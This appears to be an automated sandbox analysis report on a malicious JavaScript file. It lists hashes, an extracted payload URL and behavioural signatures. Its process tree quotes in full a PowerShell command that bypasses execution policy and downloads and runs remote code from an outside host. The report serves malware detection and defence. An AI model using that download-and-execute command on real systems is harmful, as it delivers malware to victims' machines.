Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c31b0a69e3c2cdb394754dbce34aaba8e79e809285177faffdb1506b6f05a01f.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c31b0a69e3c2cdb394754dbce34aaba8e79e809285177faffdb1506b6f05a01f.js
Resource
win10v2004-20240226-en
General
-
Target
c31b0a69e3c2cdb394754dbce34aaba8e79e809285177faffdb1506b6f05a01f.js
-
Size
65KB
-
MD5
5a386788ea13ca8f516f3a304c3b13fa
-
SHA1
8e3a1bda560808459e5938afa426f84ba3acfeb3
-
SHA256
c31b0a69e3c2cdb394754dbce34aaba8e79e809285177faffdb1506b6f05a01f
-
SHA512
2480cc7b183529906a59ceb02a712b07b1e33ec9fcf77db367e0c374f7a0d437fde99454f8229ad5c9e676eee2866f70f6721df2d34e88a251367da267fada18
-
SSDEEP
1536:ol33+qFCiH1CslxL7v3+AhFb0Er1U6h2DHXjW03apMFFfPQWQsNcl7VlH8aFCy8m:dqAC1CslxLL+0Vj1YK03aUfPQW3al7VN
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2588 powershell.exe 4 2588 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2588 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2740 wrote to memory of 2588 2740 wscript.exe 28 PID 2740 wrote to memory of 2588 2740 wscript.exe 28 PID 2740 wrote to memory of 2588 2740 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\c31b0a69e3c2cdb394754dbce34aaba8e79e809285177faffdb1506b6f05a01f.js1⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-